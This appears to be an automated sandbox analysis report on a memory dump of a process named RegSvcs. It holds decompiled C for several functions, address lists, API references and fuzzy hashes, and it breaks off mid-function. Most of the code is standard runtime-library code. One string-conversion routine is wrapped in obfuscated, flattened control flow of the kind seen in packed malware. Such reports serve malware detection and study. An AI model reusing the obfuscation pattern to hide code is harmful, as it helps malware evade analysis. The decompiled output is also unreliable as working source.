0x0043de4d
0x0043de4f
0x0043de69
0x0043de71
0x0043de79
0x0043de81
0x0043de89
0x0043de91
0x0043de97
0x0043de9f
0x0043dea5
0x0043deab
0x0043dead
0x00000000
0x0043deaf
0x0043deb7
0x0043debd
0x0043debf
0x00000000
0x0043dec1
0x0043dec4
0x0043dec5
0x0043dec6
0x0043decd
0x0043decf
0x00000000
0x0043ded1
0x0043ded9
0x0043dee1
0x0043dee9
0x0043def1
0x0043def9
0x0043df01
0x0043df07
0x0043df0f
0x0043df15
0x0043df1b
0x0043df1d
0x00000000
0x0043df23
0x0043df2b
0x0043df31
0x0043df33
0x00000000
0x0043df39
0x0043df4b
0x0043df51
0x0043df53
0x00000000
0x0043df59
0x0043df59
0x0043df59
0x0043df53
0x0043df33
0x0043df1d
0x0043decf
0x0043debf
0x0043de51
0x0043de51
0x0043de51
0x0043de56
0x00000000
0x0043de56
0x0043de4f
0x0043de1b
0x0043ddfc
0x0043ddde
0x0043ddde
0x0043dde3
0x0043df6d
0x0043df6d
0x0043df6d
0x0043df7d

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4acd9781fa0bbac26e7b71ae251ef6b3677b6dfbc286e461af57443ac98877b
Instruction ID: 2af6441634c8944f30c807d40ce82c5f858cfa764d84d47f83e669a273554d45
Opcode Fuzzy Hash: f4acd9781fa0bbac26e7b71ae251ef6b3677b6dfbc286e461af57443ac98877b
Instruction Fuzzy Hash: AE514C3AD00209AACB01DFE4EC41AEEB7B8EF1C710F14102BE815EB250E734DA45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043E854 Relevance: 7.6, APIs: 5, Instructions: 143
pipeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043E854(intOrPtr __edx, long _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				struct _BY_HANDLE_FILE_INFORMATION _v60;
				long _v64;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t82;
				void* _t83;
				signed int _t85;
				void* _t93;
				intOrPtr* _t94;
				signed int _t95;

				_t92 = __edx;
				_t44 =  *0x460120; // 0x5959051
				_v8 = _t44 ^ _t95;
				_t83 = _a12;
				_t94 = _a16;
				_v64 = _a4;
				_t85 = GetFileType(_t83) & 0xffff7fff;
				if(_t85 != 1) {
					if(_t85 == 2 || _t85 == 3) {
						_t92 = 0x1000;
						 *((short*)(_t94 + 6)) = ((0 | _t85 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
						 *((short*)(_t94 + 8)) = 1;
						_t57 = _a8;
						 *((intOrPtr*)(_t94 + 0x10)) = _t57;
						 *_t94 = _t57;
						if(_t85 != 2) {
							_t93 = 0;
							if(PeekNamedPipe(_t83, 0, 0, 0,  &_v64, 0) != 0) {
								asm("cdq");
								 *((intOrPtr*)(_t94 + 0x18)) = _v64;
								 *((intOrPtr*)(_t94 + 0x1c)) = 0x1000;
							}
						}
						L16:
						_t59 = 1;
						goto L17;
					} else {
						if(_t85 != 0) {
							L12:
							E0043C34C(GetLastError());
							L11:
							_t59 = 0;
							L17:
							return E00431C58(_t59, _t83, _v8 ^ _t95, _t92, _t93, _t94);
						}
						 *((intOrPtr*)(E0043C326())) = 9;
						goto L11;
					}
				}
				 *((short*)(_t94 + 8)) = 1;
				_t93 = 0;
				_t67 = _v64;
				if(_v64 == 0) {
					L4:
					E004343A0(_t93,  &_v60, _t93, 0x34);
					if(GetFileInformationByHandle(_t83,  &_v60) == 0) {
						goto L12;
					}
					 *((short*)(_t94 + 6)) = E0043E46D(_v60.dwFileAttributes, _v64);
					 *((intOrPtr*)(_t94 + 0x28)) = E0043EB04(_t83, _t93, _t94, _v60.ftLastWriteTime, _v36, _t93, _t93);
					 *((intOrPtr*)(_t94 + 0x2c)) = _t92;
					 *((intOrPtr*)(_t94 + 0x20)) = E0043EB04(_t83, _t93, _t94, _v60.ftLastAccessTime, _v44, _t74, _t92);
					 *((intOrPtr*)(_t94 + 0x24)) = _t92;
					 *((intOrPtr*)(_t94 + 0x30)) = E0043EB04(_t83, _t93, _t94, _v60.ftCreationTime, _v52,  *((intOrPtr*)(_t94 + 0x28)),  *((intOrPtr*)(_t94 + 0x2c)));
					 *((intOrPtr*)(_t94 + 0x34)) = _t92;
					if(E0043E378( &_v60, _t94 + 0x18) != 0) {
						goto L16;
					}
					goto L11;
				}
				_v68 = 0;
				if(E0043E51B(_t83, _t67,  &_v68) == 0) {
					goto L11;
				} else {
					_t82 = _v68 - 1;
					 *((intOrPtr*)(_t94 + 0x10)) = _t82;
					 *_t94 = _t82;
					goto L4;
				}
			}

0x0043e854
0x0043e85c
0x0043e863
0x0043e86a
0x0043e86e
0x0043e873
0x0043e880
0x0043e889
0x0043e944
0x0043e96f
0x0043e97f
0x0043e986
0x0043e98a
0x0043e98d
0x0043e990
0x0043e995
0x0043e997
0x0043e9aa
0x0043e9af
0x0043e9b0
0x0043e9b3
0x0043e9b3
0x0043e9aa
0x0043e9b6
0x0043e9b8
0x00000000
0x0043e94b
0x0043e94d
0x0043e95e
0x0043e965
0x0043e95a
0x0043e95a
0x0043e9b9
0x0043e9c7
0x0043e9c7
0x0043e954
0x00000000
0x0043e954
0x0043e944
0x0043e88f
0x0043e893
0x0043e895
0x0043e89a
0x0043e8bc
0x0043e8c3
0x0043e8d8
0x00000000
0x00000000
0x0043e8ef
0x0043e900
0x0043e906
0x0043e911
0x0043e917
0x0043e925
0x0043e92f
0x0043e93d
0x00000000
0x00000000
0x00000000
0x0043e93f
0x0043e89f
0x0043e8ad
0x00000000
0x0043e8b3
0x0043e8b6
0x0043e8b7
0x0043e8ba
0x00000000
0x0043e8ba

APIs

GetFileType.KERNEL32(0043E779,?,00000000,?), ref: 0043E876
GetFileInformationByHandle.KERNEL32(0043E779,?), ref: 0043E8D0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0043E779,?,000000FF,00000000), ref: 0043E95E
__dosmaperr.LIBCMT ref: 0043E965
PeekNamedPipe.KERNEL32(0043E779,00000000,00000000,00000000,?,00000000), ref: 0043E9A2

Part of subcall function 0043E51B: __dosmaperr.LIBCMT ref: 0043E550

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 0fb81ab453a574b0c552ba555a7f6750126b299207ea3441efb4de2412369ec2
Instruction ID: 6b5a34eb9688d73b7c2f0c437287c658de59698f40cd202aa2d7fc6b248d718f
Opcode Fuzzy Hash: 0fb81ab453a574b0c552ba555a7f6750126b299207ea3441efb4de2412369ec2
Instruction Fuzzy Hash: A6416DB1901304AFDB64DFA6DC45AABBBF9EF8C314B10542EF856D3691E734A840CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00419FDD Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00419FDD() {
				signed int _t37;
				int _t45;
				char* _t49;
				char* _t50;
				signed int _t52;
				signed int _t53;
				signed int* _t56;

				_t56[4] = 0xd95f0960;
				_t49 = 0x450306d5;
				if(_t56[0xb] != 0) {
					_t49 = 0x16e1dd94;
				}
				_t50 = 0xd95f0960;
				_t53 = _t56[5];
				_t52 = _t56[3];
				L3:
				while(1) {
					while(_t50 <= 0xe09b1ecf) {
						if(_t50 > 0xc5813cbf) {
							if(_t50 > 0xd95f095f) {
								if(_t50 == 0xd95f0960) {
									_t52 = 0;
									_t50 = _t49;
								} else {
									if(_t50 == 0xdc20296a) {
										 *_t56 = 0x18f +  *_t56 * 8;
										_t50 = 0x23d74123;
									}
								}
							} else {
								if(_t50 == 0xc5813cc0) {
									_push(1);
									_push(_t56[2] + 1);
									_t37 = E0043EBC9();
									_t56 =  &(_t56[2]);
									_t56[1] = _t37;
									_t50 = 0x9a608435;
								} else {
									if(_t50 == 0xd7dacfb9) {
										 *_t56 = 0x00000144 +  *_t56 * 0x00000004 >> 0x00000010 & 0x0000fc00;
										_t50 = 0xc27b1fbe;
									}
								}
							}
							continue;
						}
						if(_t50 > 0xa101dfee) {
							if(_t50 == 0xa9e4c97a) {
								_t53 = (_t53 * 0xa8000 >> 4) + 0xffffff79;
								E00411F34();
								L37:
								_t50 = 0xe09b1ed0;
								continue;
							}
							if(_t50 != 0xc27b1fbe) {
								if(_t50 != 0xa101dfef) {
									continue;
								}
								_t56[4] = _t50;
								_t56[3] = _t52;
								_t56[5] = 0xfc53508e + _t53 * 0x76000;
								_push(0x83a);
								E00415185(0x114b, 0xfc53508e + _t53 * 0x76000);
								L50:
								_t56[4] = _t50;
								_t56[5] = _t53;
								_t56[3] = _t52;
								return _t52;
							}
							E0043F602(_t56[1]);
							_t56 =  &(_t56[1]);
							_t50 = 0x450306d5;
							L42:
							_t52 = 0;
							continue;
						}
						if(_t50 == 0x8be491b7) {
							_t56[2] = WideCharToMultiByte(0xfde9, 0, _t56[0x10], 0xffffffff, 0, 0, 0, 0);
							_t50 = 0xdc20296a;
							continue;
						}
						if(_t50 == 0x9a608435) {
							goto L37;
						} else {
							continue;
						}
					}
					if(_t50 > 0x23d74122) {
						if(_t50 > 0x450306d4) {
							if(_t50 != 0x4e69e340) {
								if(_t50 != 0x450306d5) {
									continue;
								}
								goto L50;
							}
							_t50 = 0x450306d5;
							if(_t56[2] != 0) {
								_t50 = 0x28cf2a12;
							}
							goto L42;
						} else {
							if(_t50 == 0x23d74123) {
								_t50 = 0x4e69e340;
							} else {
								if(_t50 == 0x28cf2a12) {
									 *_t56 = ( *_t56 << 6) + 0x38d0;
									_t50 = 0xc5813cc0;
								}
							}
							continue;
						}
					}
					if(_t50 > 0x12b15d55) {
						if(_t50 == 0x12b15d56) {
							_t45 = WideCharToMultiByte(0xfde9, 0, _t56[0x10], 0xffffffff, _t56[4], _t56[4], 0, 0);
							_t50 = 0xd7dacfb9;
							if(_t45 != 0) {
								_t50 = 0x450306d5;
							}
							_t52 = _t56[1];
						} else {
							if(_t50 == 0x16e1dd94) {
								_t50 = 0x8be491b7;
							}
						}
						continue;
					}
					if(_t50 == 0xe09b1ed0) {
						_t50 = 0x450306d5;
						if(_t56[1] != 0) {
							_t50 = 0xe9a5d836;
						}
						goto L42;
					} else {
						if(_t50 == 0xe9a5d836) {
							 *_t56 = ( *_t56 & 0xffffff80) << 0xa;
							_t50 = 0x12b15d56;
						}
						continue;
					}
				}
			}

0x00419fe4
0x00419fec
0x00419ff6
0x00419ff8
0x00419ff8
0x00419ffd
0x0041a002
0x0041a006
0x00000000
0x0041a00c
0x0041a00c
0x0041a01a
0x0041a083
0x0041a130
0x0041a201
0x0041a203
0x0041a136
0x0041a13c
0x0041a14c
0x0041a14f
0x0041a14f
0x0041a13c
0x0041a089
0x0041a08f
0x0041a1ca
0x0041a1cc
0x0041a1cd
0x0041a1d2
0x0041a1d5
0x0041a1d9
0x0041a095
0x0041a09b
0x0041a0b3
0x0041a0b6
0x0041a0b6
0x0041a09b
0x0041a08f
0x00000000
0x0041a083
0x0041a022
0x0041a102
0x0041a1ec
0x0041a1f2
0x0041a1f7
0x0041a1f7
0x00000000
0x0041a1f7
0x0041a10e
0x0041a273
0x00000000
0x00000000
0x0041a279
0x0041a27d
0x0041a28c
0x0041a290
0x0041a29b
0x0041a2a0
0x0041a2a0
0x0041a2a4
0x0041a2a8
0x0041a2b5
0x0041a2b5
0x0041a118
0x0041a11d
0x0041a120
0x0041a225
0x0041a225
0x00000000
0x0041a225
0x0041a02e
0x0041a1b7
0x0041a1bb
0x00000000
0x0041a1bb
0x0041a03a
0x00000000
0x0041a040
0x00000000
0x0041a040
0x0041a03a
0x0041a048
0x0041a0c6
0x0041a181
0x0041a265
0x00000000
0x00000000
0x00000000
0x0041a26b
0x0041a18c
0x0041a191
0x0041a197
0x0041a197
0x00000000
0x0041a0cc
0x0041a0d2
0x0041a20a
0x0041a0d8
0x0041a0de
0x0041a0ef
0x0041a0f2
0x0041a0f2
0x0041a0de
0x00000000
0x0041a0d2
0x0041a0c6
0x0041a050
0x0041a15f
0x0041a242
0x0041a248
0x0041a24f
0x0041a251
0x0041a251
0x0041a256
0x0041a165
0x0041a16b
0x0041a171
0x0041a171
0x0041a16b
0x00000000
0x0041a15f
0x0041a05c
0x0041a219
0x0041a21e
0x0041a220
0x0041a220
0x00000000
0x0041a062
0x0041a068
0x0041a073
0x0041a076
0x0041a076
0x00000000
0x0041a068
0x0041a05c

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0041A1B1
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,D95F0960,D95F0960,00000000,00000000), ref: 0041A242

Strings

@iN, xrefs: 0041A17B
@iN, xrefs: 0041A20A

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: @iN$@iN
API String ID: 626452242-3233214023
Opcode ID: 4064ba40b4a1872f095a636e800c8af49be0c000bd0679024bbf5a30cdac80cd
Instruction ID: db43d668ab74d13fe67cc0e7a5a8f8f9e815d81fdeb39425e3f1c03ccb82280f
Opcode Fuzzy Hash: 4064ba40b4a1872f095a636e800c8af49be0c000bd0679024bbf5a30cdac80cd
Instruction Fuzzy Hash: 9751353160A300EBDA388E1599A59BF7BA0AFD9314F14052FE45797790DA3D8CE08B4F

Uniqueness

Uniqueness Score: -1.00%

Function 00451254 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 54%

			E00451254(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E00443C86(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E00443C86(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E00447156(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E00447006(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E004511D4(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00443BF4(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E00443DD0(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E00443DD0(_t65, _t83);
				}
			}

0x00451254
0x00451254
0x00451254
0x0045125b
0x00451264
0x00451383
0x0045126a
0x0045126a
0x0045126b
0x0045126c
0x00451276
0x00451279
0x0045127f
0x00451289
0x004512ae
0x004512b3
0x004512b8
0x0045137f
0x00000000
0x00451380
0x004512b8
0x00451289
0x004512be
0x004512c1
0x004512c4
0x004512ca
0x004512e2
0x004512e7
0x004512ea
0x004512ed
0x004512f0
0x004512f3
0x004512f9
0x004512ff
0x00451302
0x00451305
0x00451314
0x00451315
0x00451315
0x0045131a
0x0045132d
0x0045132f
0x00451334
0x0045133f
0x00451341
0x00451343
0x0045135f
0x00451364
0x00451367
0x00451367
0x0045133f
0x00451334
0x0045136d
0x0045136e
0x00451371
0x00451374
0x00451377
0x0045137a
0x00451305
0x00000000
0x004512f9
0x00451384
0x00451389
0x0045138a
0x0045138b
0x0045138c
0x0045138d
0x0045138e
0x0045138f
0x0045139e
0x004513ae
0x004513b5
0x004513bb
0x004513bc
0x004513c8
0x004513ca
0x004513ca
0x004513d9
0x004513d9

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0045115A,?,?,00000000,00000000,00000000,?), ref: 00451279
CatchIt.LIBVCRUNTIME ref: 0045135F

Strings

MOC, xrefs: 0045128B
RCC, xrefs: 00451293

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 1dbe646e0584cb34eb7b2ebf1494bb52ef81130e9719811921b0e9c21dcf595b
Instruction ID: 8c4ae3fa6e179edf632f75b5b649c27b13278f4f7ef18d8fc807f1ad19e789b5
Opcode Fuzzy Hash: 1dbe646e0584cb34eb7b2ebf1494bb52ef81130e9719811921b0e9c21dcf595b
Instruction Fuzzy Hash: 3E417972900209AFEF15CF94CD81AEEBBB5BF08305F14819AFD04A6222D3399A51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0044E1C1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044E1C1(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00448B8E(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x0044e1ce
0x0044e1d6
0x0044e20b
0x0044e1d8
0x0044e1e1
0x00000000
0x0044e208
0x0044e207
0x0044e207

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0044E25D,?,?,?,?,?,?,0044E0A5,00000000,FlsAlloc,0045AB80,0045AB88), ref: 0044E1CE
GetLastError.KERNEL32(?,0044E25D,?,?,?,?,?,?,0044E0A5,00000000,FlsAlloc,0045AB80,0045AB88,?,?,00443C42), ref: 0044E1D8
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00443C42,00443D26,00000003,00434D5B), ref: 0044E200

Strings

api-ms-, xrefs: 0044E1E5

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 309e3b77e4464d6a713076cb7bcdbdc2e7ba88fbe075476d775536a14441c2b8
Instruction ID: f6cfb95bd95b575880a2e59eaca4e563adad3a674e6eb41ea182a5d27e6c2e02
Opcode Fuzzy Hash: 309e3b77e4464d6a713076cb7bcdbdc2e7ba88fbe075476d775536a14441c2b8
Instruction Fuzzy Hash: 1FE04831780304B7FF201B61EC4AF5A3B59BF10B56F140071FA0DA81E1D7E5E950958D

Uniqueness

Uniqueness Score: -1.00%

Function 00447C0A Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00447C0A(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				intOrPtr _t187;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x454bea);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x460120; // 0x5959051
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_t13 = _t268 + 0x18; // 0x14458b08
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x461570 + _t291 * 4)) + _t13));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00434D60(_t265, _t317);
				}
				_t19 = _t265 + 0xc; // 0x4617c4
				_t187 =  *_t19;
				_t307 = _a4;
				_t21 = _t187 + 8; // 0x0
				_v108 =  *_t21;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x461570 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x461570 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x461570 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E00446DED(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00446DED(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x4608a0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x461570 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E0044DD2B( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x4608a0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x461570 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E004338A0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x461570 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E0044DD2B( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
